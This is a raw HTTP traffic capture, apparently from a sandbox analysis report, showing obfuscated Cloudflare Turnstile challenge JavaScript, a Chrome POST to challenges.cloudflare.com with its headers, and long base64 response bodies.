                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 67 4d 28 35 38 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 7c 64 5b 67 4d 28 36 38 32 29 5d 28 4d 2c 31 29 2c 64 5b 67 4d 28 31 31 33 39 29 5d 28 49 2c 64 5b 67 4d 28 31 33 36 37 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 67 4d 28 31 30 38 30 29 5d 28 64 5b 67 4d 28 31 35 34 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 67 4d 28 35 38 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b
                                                                                                                                                                                                                                                          Data Ascii: )),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[gM(588)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=H<<1|d[gM(682)](M,1),d[gM(1139)](I,d[gM(1367)](j,1))?(I=0,G[gM(1080)](d[gM(1547)](o,H)),H=0):I++,M>>=1,s++);C=(D--,D==0&&(D=Math[gM(588)](2,F),F++),x[L]=E++
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 69 2c 67 4f 29 7b 72 65 74 75 72 6e 20 67 4f 3d 67 4e 2c 68 5b 67 4f 28 38 38 30 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 50 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 67 50 3d 67 4b 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 50 28 35 38 38 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 64 5b 67 50 28 31 37 31 39 29 5d 28 46 2c 4b 29 3b 29 66 6f 72 28 4c 3d 67 50 28 39 39 34 29 5b 67 50 28 34 36 38 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68
                                                                                                                                                                                                                                                          Data Ascii: i,gO){return gO=gN,h[gO(880)](i)})},'i':function(i,j,o,gP,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(gP=gK,s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[gP(588)](2,2),F=1;d[gP(1719)](F,K);)for(L=gP(994)[gP(468)]('|'),M=0;!![];){switch
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4f 29 4f 3d 64 5b 67 50 28 37 30 38 29 5d 28 45 2c 45 5b 67 50 28 31 32 35 31 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 67 50 28 31 30 38 30 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4f 5b 67 50 28 31 32 35 31 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4f 2c 64 5b 67 50 28 31 34 35 32 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 67 50 28 35 38 38 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 67 4b 28 31 35 32 34 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 37 35 32 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 36 35 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 37 29 7b 69 66 28 68 37 3d 67 4a 2c 65 4d 5b 68 37 28 37
                                                                                                                                                                                                                                                          Data Ascii: ),s[O])O=s[O];else if(B===O)O=d[gP(708)](E,E[gP(1251)](0));else return null;D[gP(1080)](O),s[B++]=E+O[gP(1251)](0),x--,E=O,d[gP(1452)](0,x)&&(x=Math[gP(588)](2,C),C++)}}},g={},g[gK(1524)]=f.h,g}(),eM[gJ(752)]=![],eM[gJ(1654)]=function(h7){if(h7=gJ,eM[h7(7
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 7a 48 4a 72 69 27 3a 69 39 28 31 36 31 36 29 2c 27 4b 4d 52 6c 53 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 6c 65 43 67 56 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 79 6a 79 6e 46 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 47 6a 46 42 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 7d 2c 68 3d 3d 3d 6e 75 6c 6c 7c 7c 6f 5b 69 39 28 31 31 35 37 29 5d 28 76 6f 69 64 20 30 2c 68 29 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 66 41 28 68 29 2c 67 5b 69 39 28 39 37 33 29
                                                                                                                                                                                                                                                          Data Ascii: ':function(G,H){return G(H)},'zHJri':i9(1616),'KMRlS':function(G,H,I){return G(H,I)},'leCgV':function(G,H){return G+H},'yjynF':function(G,H,I){return G(H,I)},'GjFBo':function(G,H){return G+H}},h===null||o[i9(1157)](void 0,h))return j;for(x=fA(h),g[i9(973)
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 65 74 75 72 6e 20 68 2a 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 65 5b 69 64 28 34 38 39 29 5d 28 31 65 33 2c 65 4d 5b 69 64 28 37 30 37 29 5d 5b 69 64 28 31 35 34 32 29 5d 28 32 3c 3c 66 2c 33 32 29 29 2c 65 4d 5b 69 64 28 31 35 38 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 65 29 7b 69 65 3d 69 64 2c 65 4d 5b 69 65 28 35 38 31 29 5d 26 26 28 65 4d 5b 69 65 28 39 35 34 29 5d 5b 69 65 28 34 30 34 29 5d 28 29 2c 65 4d 5b 69 65 28 39 35 34 29 5d 5b 69 65 28 31 30 37 36 29 5d 28 29 2c 65 4d 5b 69 65 28 31 35 33 36 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 69 65 28 35 38 31 29 5d 5b 69 65 28 33 37 30 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 65 28 31 30 36 34 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 69 65 28 31 36 34 32 29 5d 5b 69 65 28 39 39 31 29 5d 2c 27 65 76
                                                                                                                                                                                                                                                          Data Ascii: eturn h*i},e=d,f=1,g=e[id(489)](1e3,eM[id(707)][id(1542)](2<<f,32)),eM[id(1583)](function(ie){ie=id,eM[ie(581)]&&(eM[ie(954)][ie(404)](),eM[ie(954)][ie(1076)](),eM[ie(1536)]=!![],eM[ie(581)][ie(370)]({'source':ie(1064),'widgetId':eM[ie(1642)][ie(991)],'ev
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 2c 6d 2c 21 21 5b 5d 29 2c 73 5b 69 67 28 37 36 36 29 5d 3d 35 65 33 2c 73 5b 69 67 28 31 37 32 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 73 5b 69 67 28 33 39 37 29 5d 28 69 67 28 31 35 38 34 29 2c 69 67 28 39 34 36 29 29 2c 42 3d 7b 7d 2c 42 5b 69 67 28 31 31 30 35 29 5d 3d 66 2c 42 5b 69 67 28 31 36 30 33 29 5d 3d 6a 2c 42 2e 63 63 3d 67 2c 42 5b 69 67 28 35 37 34 29 5d 3d 6b 2c 42 5b 69 67 28 33 39 39 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 69 67 28 31 33 35 36 29 5d 28 42 29 2c 44 3d 65 4f 5b 69 67 28 31 35 32 34 29 5d 28 43 29 5b 69 67 28 31 35 36 30 29 5d 28 27 2b 27 2c 69 5b 69 67 28 37 33 38 29 5d 29 2c 73 5b 69 67 28 36 38 30 29 5d 28 69 5b 69 67 28 37 37 38 29 5d 28 27 76 5f 27 2b 65 4d 5b 69 67 28 31 36 34 32 29 5d 5b 69 67 28 31 30 34 30
                                                                                                                                                                                                                                                          Data Ascii: ,m,!![]),s[ig(766)]=5e3,s[ig(1728)]=function(){},s[ig(397)](ig(1584),ig(946)),B={},B[ig(1105)]=f,B[ig(1603)]=j,B.cc=g,B[ig(574)]=k,B[ig(399)]=o,C=JSON[ig(1356)](B),D=eO[ig(1524)](C)[ig(1560)]('+',i[ig(738)]),s[ig(680)](i[ig(778)]('v_'+eM[ig(1642)][ig(1040


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          14192.168.2.549742104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Content-Length: 3273
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          CF-Challenge: Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC3273OUTData Raw: 76 5f 38 66 35 33 37 33 38 66 35 63 66 61 31 35 62 62 3d 25 32 62 4f 67 49 44 49 69 49 6c 49 5a 49 4d 49 2d 73 51 76 73 51 53 79 35 53 35 48 39 37 35 39 51 35 79 68 48 45 35 6c 68 51 70 73 51 68 45 38 51 32 72 49 45 24 6e 53 72 24 44 50 4f 35 54 51 4b 79 69 45 51 71 69 49 51 4c 62 51 39 78 55 51 37 64 79 51 48 67 50 49 70 72 51 55 49 69 44 64 51 4d 73 24 51 6d 35 51 39 58 73 51 32 55 65 75 71 37 49 70 36 50 35 37 50 49 75 45 64 68 65 2b 62 6c 67 51 75 76 31 2d 72 51 53 49 6e 45 51 68 49 32 4c 72 51 5a 58 5a 6e 24 51 36 4c 78 45 41 4b 79 24 2d 4d 24 6f 61 4d 63 53 77 68 69 73 50 51 69 4c 69 32 62 24 51 2d 79 51 65 4c 51 51 62 76 32 79 51 32 34 44 6e 5a 32 79 51 72 6f 4f 62 6e 24 35 58 6b 2b 34 62 4d 67 51 2b 77 73 53 42 6c 61 34 51 62 32 4c 2d 72 44 44 34
                                                                                                                                                                                                                                                          Data Ascii: v_8f53738f5cfa15bb=%2bOgIDIiIlIZIMI-sQvsQSy5S5H9759Q5yhHE5lhQpsQhE8Q2rIE$nSr$DPO5TQKyiEQqiIQLbQ9xUQ7dyQHgPIprQUIiDdQMs$Qm5Q9XsQ2Ueuq7Ip6P57PIuEdhe+blgQuv1-rQSInEQhI2LrQZXZn$Q6LxEAKy$-M$oaMcSwhisPQiLi2b$Q-yQeLQQbv2yQ24DnZ2yQroObn$5Xk+4bMgQ+wsSBla4Qb2L-rDD4
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC767INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:57 GMT
                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 160140
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cf-chl-gen: 6KHJNncUJLfZ0NFmtkz0x9J5Kmd0dhR9bNBjUNlhY+40qYAY0xQRceKaYVj2q2Dv6L5+IOSWt0JBeolH1REWxOemRA//ZWgGfgidA7XqSQsPiW4jSbVoletg7LwsEk2lDyB58IhqDOaT+9m+R6nSaRZ2jdu2Q4yxwi3EeENf+28gHnFLiGC/4HWKiZRQivZisiYT8KKXpNBFpwfWmUaqM4mEUzC8CCOFlMZ1sHtt9CdLuOEreWP9UMl1X3M3snpwqOzRNsZ+iSxDpTrGcm+F4zTwuG50g8gva3o9RVRhiJj0uG3T5+BLSS+t6y59MXH4DgHqnRCGZoj4GDsceL5fV9u+Tne1EpNIoS4Qk5fCP49GPjivxjUhffMLLnE9xSZKxnRRNfIUwr2pQIstKEdVJJI02Bf0J5hVCZSGR/xLqlqbWAHIXoWd/BiaXUhPNtPN+Y/8zUZ+3EvAcusd4WSbOYdjtpumdjUDCmcgOoY6YFbxisPk4PT0vAaA8CqljLEvsQ==$T1uctGuKXfk1cVza
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373a879544331-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC602INData Raw: 58 32 4e 7a 55 34 35 73 6c 4a 5a 58 69 48 4b 49 69 57 78 71 65 6d 79 53 6b 5a 64 7a 70 6f 64 2b 70 35 68 68 66 49 4f 6d 6e 33 32 6b 67 34 78 76 73 59 53 74 65 4b 32 45 70 33 57 35 75 4b 79 75 75 4b 2b 37 72 70 75 61 74 5a 78 37 6b 71 4c 4a 68 73 6e 4d 69 38 44 53 69 74 43 70 73 73 6d 6f 7a 63 37 53 6c 34 2b 64 7a 4c 48 61 33 4c 6e 67 34 36 57 79 74 2b 53 7a 34 75 50 5a 78 61 6e 63 37 65 76 53 34 50 48 75 71 66 47 7a 38 72 6e 4c 2b 2f 33 32 39 75 33 4b 38 50 73 48 41 4c 30 42 39 77 6f 44 41 76 6e 57 42 4d 30 4c 43 38 33 6d 44 77 38 55 7a 2b 4d 61 35 2b 6e 6d 45 41 33 71 32 75 76 31 48 41 44 77 32 52 48 70 45 78 34 46 44 65 63 75 41 79 77 73 49 50 45 76 48 7a 6a 79 38 2f 67 53 38 7a 73 74 2f 42 63 54 4c 52 6f 2b 42 54 33 2b 46 30 4d 7a 46 79 63 67 4f 54 30
                                                                                                                                                                                                                                                          Data Ascii: X2NzU45slJZXiHKIiWxqemySkZdzpod+p5hhfIOmn32kg4xvsYSteK2Ep3W5uKyuuK+7rpuatZx7kqLJhsnMi8DSitCpssmozc7Sl4+dzLHa3Lng46Wyt+Sz4uPZxanc7evS4PHuqfGz8rnL+/329u3K8PsHAL0B9woDAvnWBM0LC83mDw8Uz+Ma5+nmEA3q2uv1HADw2RHpEx4FDecuAywsIPEvHzjy8/gS8zst/BcTLRo+BT3+F0MzFycgOT0
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 42 43 4e 68 55 59 52 68 6f 6c 54 42 5a 4f 4e 52 74 64 5a 55 4e 43 55 56 70 48 4b 6a 6c 71 5a 6d 67 6f 50 53 35 61 5a 44 42 6c 62 57 4e 75 4e 6c 56 75 53 32 31 76 56 57 39 4c 57 34 4a 51 5a 6b 52 44 68 47 5a 38 56 49 42 45 66 48 64 39 52 34 46 4d 6b 47 4e 4f 66 34 47 57 64 31 47 52 6a 32 71 52 63 35 2b 67 62 70 2b 58 65 6e 46 6a 67 49 4a 7a 5a 33 2b 76 67 6d 65 6e 70 37 53 78 68 37 57 6a 70 35 71 43 65 49 36 4b 6d 5a 32 75 6b 62 57 42 6d 5a 37 47 68 71 6d 6f 67 62 37 46 6d 59 43 77 73 62 79 65 79 4c 53 53 79 63 6d 57 7a 4d 4b 35 79 5a 7a 57 75 4c 44 4d 76 70 2b 74 77 64 75 7a 31 38 4b 38 34 63 50 67 79 36 2f 66 77 73 4c 77 71 74 44 53 77 4c 58 7a 7a 76 62 36 30 4f 6a 79 75 63 72 42 75 77 58 74 78 65 54 46 35 63 6e 6f 79 65 58 4e 37 4d 30 49 30 66 44 52 43
                                                                                                                                                                                                                                                          Data Ascii: BCNhUYRholTBZONRtdZUNCUVpHKjlqZmgoPS5aZDBlbWNuNlVuS21vVW9LW4JQZkRDhGZ8VIBEfHd9R4FMkGNOf4GWd1GRj2qRc5+gbp+XenFjgIJzZ3+vgmenp7Sxh7Wjp5qCeI6KmZ2ukbWBmZ7Ghqmogb7FmYCwsbyeyLSSycmWzMK5yZzWuLDMvp+twduz18K84cPgy6/fwsLwqtDSwLXzzvb60OjyucrBuwXtxeTF5cnoyeXN7M0I0fDRC
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 74 57 53 6c 4f 50 45 4a 45 48 79 35 6a 58 6d 42 69 58 57 70 6e 58 31 77 2b 59 53 6f 38 5a 6d 5a 73 56 6d 77 76 65 44 46 55 4e 6e 52 53 56 44 74 30 62 48 59 39 64 45 55 2f 68 6b 5a 4a 61 45 64 46 53 47 74 63 6a 32 78 68 52 6f 46 74 62 32 42 70 57 48 56 6b 64 4a 6c 74 62 5a 78 69 6d 35 36 66 6b 58 47 43 70 4a 56 39 58 71 71 5a 71 4b 53 75 6e 61 79 53 73 71 47 77 63 62 61 6c 74 62 43 36 71 62 6d 65 76 71 32 39 77 36 4f 66 75 4a 57 37 78 36 4f 48 6d 34 36 4b 76 5a 36 2b 72 70 43 6a 76 39 69 68 70 61 2b 6c 73 39 36 63 71 37 71 63 73 38 2f 6a 76 74 7a 53 73 4c 2f 6a 70 2b 65 38 35 64 32 71 79 66 4c 64 71 36 2f 77 37 75 65 34 73 37 66 37 2b 2b 76 4e 76 62 38 44 32 4e 62 7a 34 77 50 62 2f 63 67 45 31 77 66 6b 37 4f 72 79 37 66 33 63 43 39 38 52 36 39 4c 54 47 42
                                                                                                                                                                                                                                                          Data Ascii: tWSlOPEJEHy5jXmBiXWpnX1w+YSo8ZmZsVmwveDFUNnRSVDt0bHY9dEU/hkZJaEdFSGtcj2xhRoFtb2BpWHVkdJltbZxim56fkXGCpJV9XqqZqKSunaySsqGwcbaltbC6qbmevq29w6OfuJW7x6OHm46KvZ6+rpCjv9ihpa+ls96cq7qcs8/jvtzSsL/jp+e85d2qyfLdq6/w7ue4s7f7++vNvb8D2Nbz4wPb/cgE1wfk7Ory7f3cC98R69LTGB
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 58 57 52 46 58 30 4e 6f 53 57 4d 33 62 45 31 67 59 58 42 52 5a 46 4e 67 54 6c 4a 42 53 57 4d 33 4e 7a 31 47 52 33 46 38 55 6e 5a 73 55 31 4b 41 51 6d 64 6b 52 6f 78 46 62 31 31 47 53 47 56 74 6b 30 2b 53 61 56 42 51 6c 56 4f 46 68 57 68 6e 57 36 4a 63 6b 59 46 62 6d 4a 64 67 66 71 61 4b 65 61 47 66 68 59 5a 76 71 58 75 44 6a 6f 71 4a 62 33 47 45 6c 5a 65 34 6b 5a 71 41 6d 36 42 2b 77 35 75 46 6f 4d 47 31 71 4d 4b 45 7a 4c 33 48 68 38 4c 54 77 72 32 2b 71 38 48 4d 31 4b 50 50 30 39 7a 4a 6d 73 32 54 72 71 44 54 76 4c 61 32 76 65 50 62 36 4d 71 72 35 4c 65 2f 77 73 58 49 72 65 54 41 31 38 36 76 31 75 37 33 79 64 7a 38 7a 4f 6d 38 77 77 53 39 33 50 45 43 32 63 6e 62 41 38 33 71 37 66 41 47 34 4f 30 4c 37 76 37 78 36 38 38 62 30 2b 51 4b 32 75 72 7a 44 50 4c
                                                                                                                                                                                                                                                          Data Ascii: XWRFX0NoSWM3bE1gYXBRZFNgTlJBSWM3Nz1GR3F8UnZsU1KAQmdkRoxFb11GSGVtk0+SaVBQlVOFhWhnW6JckYFbmJdgfqaKeaGfhYZvqXuDjoqJb3GElZe4kZqAm6B+w5uFoMG1qMKEzL3Hh8LTwr2+q8HM1KPP09zJms2TrqDTvLa2vePb6Mqr5Le/wsXIreTA186v1u73ydz8zOm8wwS93PEC2cnbA83q7fAG4O0L7v7x688b0+QK2urzDPL
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 55 67 6e 4b 43 31 4d 4b 79 6b 73 54 30 42 7a 55 45 55 71 5a 56 46 54 52 45 30 38 57 55 70 78 66 7a 74 38 56 48 32 45 66 58 5a 39 69 57 74 6a 59 33 74 4a 62 70 42 38 61 34 69 43 61 58 68 51 5a 6d 52 63 68 6e 43 52 57 4a 53 41 59 35 4e 76 59 33 69 68 6f 71 42 68 61 6e 57 4b 6e 72 46 75 68 71 35 6d 62 4a 57 44 67 4c 69 55 72 33 57 6e 6c 5a 65 49 6b 59 43 64 6a 36 57 5a 65 62 6d 42 6f 36 44 4a 67 36 76 4a 73 4b 6a 4e 6f 5a 4f 78 31 71 71 72 7a 73 62 4d 74 4a 71 71 71 64 75 36 30 38 36 64 34 63 54 55 30 2b 54 66 78 64 6a 4a 36 65 37 52 32 73 76 55 33 50 57 77 79 4f 37 68 35 74 6a 4a 75 64 48 78 34 4c 37 2b 76 4e 76 56 76 77 44 39 2b 76 66 58 33 2b 6a 64 78 51 73 51 7a 50 7a 31 41 4f 37 69 35 65 73 45 2f 42 76 64 35 75 63 53 48 66 49 57 2f 42 67 52 42 53 6b 47
                                                                                                                                                                                                                                                          Data Ascii: UgnKC1MKyksT0BzUEUqZVFTRE08WUpxfzt8VH2EfXZ9iWtjY3tJbpB8a4iCaXhQZmRchnCRWJSAY5NvY3ihoqBhanWKnrFuhq5mbJWDgLiUr3WnlZeIkYCdj6WZebmBo6DJg6vJsKjNoZOx1qqrzsbMtJqqqdu6086d4cTU0+TfxdjJ6e7R2svU3PWwyO7h5tjJudHx4L7+vNvVvwD9+vfX3+jdxQsQzPz1AO7i5esE/Bvd5ucSHfIW/BgRBSkG
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 70 49 52 45 46 30 61 6a 39 33 4c 33 74 71 54 31 34 31 53 6e 78 67 56 58 4e 37 68 46 52 56 52 6c 46 41 64 59 46 57 54 48 6d 46 65 30 75 52 63 70 52 50 59 57 6c 54 69 32 78 70 58 48 70 62 6f 49 47 5a 66 5a 65 6c 64 4a 75 44 64 48 68 7a 71 4b 35 73 66 57 61 69 61 58 47 4c 6e 6e 56 70 65 49 2b 71 64 35 6d 4d 6a 72 68 33 74 6f 36 43 73 34 2b 58 79 49 4f 66 75 73 47 6e 78 36 6d 4a 69 49 4f 4e 72 38 6d 53 71 74 4c 57 30 73 54 4f 6c 64 43 64 6c 2b 44 52 6f 63 43 66 6f 4b 58 45 6f 36 47 6b 78 37 6a 72 79 4c 32 69 33 63 6e 4c 76 4d 57 30 30 63 6e 6f 30 64 44 71 79 66 57 31 38 65 7a 31 32 2f 48 62 32 2f 50 47 42 73 6f 4e 41 77 72 35 2b 4f 6e 74 37 39 76 63 43 4f 62 69 37 78 4c 6a 2b 2b 6a 39 2f 68 72 73 36 68 30 52 42 4f 34 6f 42 42 2f 32 49 79 77 6a 41 77 2f 73 2b
                                                                                                                                                                                                                                                          Data Ascii: pIREF0aj93L3tqT141SnxgVXN7hFRVRlFAdYFWTHmFe0uRcpRPYWlTi2xpXHpboIGZfZeldJuDdHhzqK5sfWaiaXGLnnVpeI+qd5mMjrh3to6Cs4+XyIOfusGnx6mJiIONr8mSqtLW0sTOldCdl+DRocCfoKXEo6Gkx7jryL2i3cnLvMW00cno0dDqyfW18ez12/Hb2/PGBsoNAwr5+Ont79vcCObi7xLj++j9/hrs6h0RBO4oBB/2IywjAw/s+
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 51 4e 31 52 6c 4d 6a 64 6f 5a 31 52 55 65 7a 74 7a 65 30 2b 44 57 33 46 6e 61 59 68 32 53 32 46 66 55 4a 4b 47 5a 48 39 53 69 47 75 44 61 6c 56 74 69 48 53 4d 64 59 74 33 59 31 78 75 65 6e 4f 58 70 70 2b 63 59 33 56 34 68 57 65 66 65 6f 70 74 6c 59 2b 42 6b 58 57 5a 6a 4a 53 4a 76 34 71 74 75 34 44 41 72 6f 4b 5a 76 4b 61 42 70 35 65 36 7a 61 4b 42 76 73 53 79 74 4a 48 41 31 4d 2b 30 79 4e 53 73 73 4e 4f 36 31 74 4b 68 77 72 2f 42 33 4e 76 42 35 38 4f 36 75 72 7a 6e 74 2b 76 48 38 63 37 4f 30 38 33 45 72 76 48 58 39 66 66 50 35 73 33 71 7a 50 4c 67 36 38 33 41 31 38 4c 56 41 76 59 42 33 41 6b 4d 41 76 6a 35 35 51 73 4c 45 76 59 4a 31 42 72 6f 45 51 58 62 37 39 37 6f 44 66 6a 35 48 50 6a 66 38 41 59 44 48 41 54 32 4c 69 4c 6d 2b 67 73 74 43 69 30 4f 46 66
                                                                                                                                                                                                                                                          Data Ascii: QN1RlMjdoZ1RUeztze0+DW3FnaYh2S2FfUJKGZH9SiGuDalVtiHSMdYt3Y1xuenOXpp+cY3V4hWefeoptlY+BkXWZjJSJv4qtu4DAroKZvKaBp5e6zaKBvsSytJHA1M+0yNSssNO61tKhwr/B3NvB58O6urznt+vH8c7O083ErvHX9ffP5s3qzPLg683A18LVAvYB3AkMAvj55QsLEvYJ1BroEQXb797oDfj5HPjf8AYDHAT2LiLm+gstCi0OFf
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 5a 30 41 36 67 32 74 45 50 6a 35 55 63 46 39 65 56 6d 4f 44 58 32 31 65 68 58 36 4e 5a 6f 68 6d 67 47 4a 30 62 47 68 75 66 6e 56 39 62 57 36 4b 68 46 75 66 67 70 64 78 71 58 31 7a 6c 5a 35 74 6f 59 70 76 5a 4b 43 6a 67 62 4b 47 68 36 2b 57 6c 6f 75 64 6e 48 57 37 69 72 53 33 67 4b 32 51 75 34 57 58 71 72 36 73 69 6f 44 48 78 4b 61 6d 6b 62 32 6e 6c 71 6d 70 71 72 57 36 7a 64 6a 4b 78 39 54 51 79 38 53 76 33 4d 48 46 78 72 4c 56 7a 4f 6e 4f 71 63 66 68 78 64 32 75 37 36 7a 47 34 4d 50 4e 72 4e 6e 74 30 62 72 58 79 37 6e 51 30 50 58 39 7a 76 48 49 77 75 44 56 34 50 62 66 41 51 59 4c 2f 76 73 4d 34 2f 59 52 46 41 72 69 2b 77 37 7a 45 64 45 51 48 67 4c 68 49 69 4d 58 2f 76 59 48 4b 51 55 71 49 52 76 36 4a 2b 7a 2b 2f 54 41 50 4b 43 51 4a 39 67 63 7a 4b 53 73
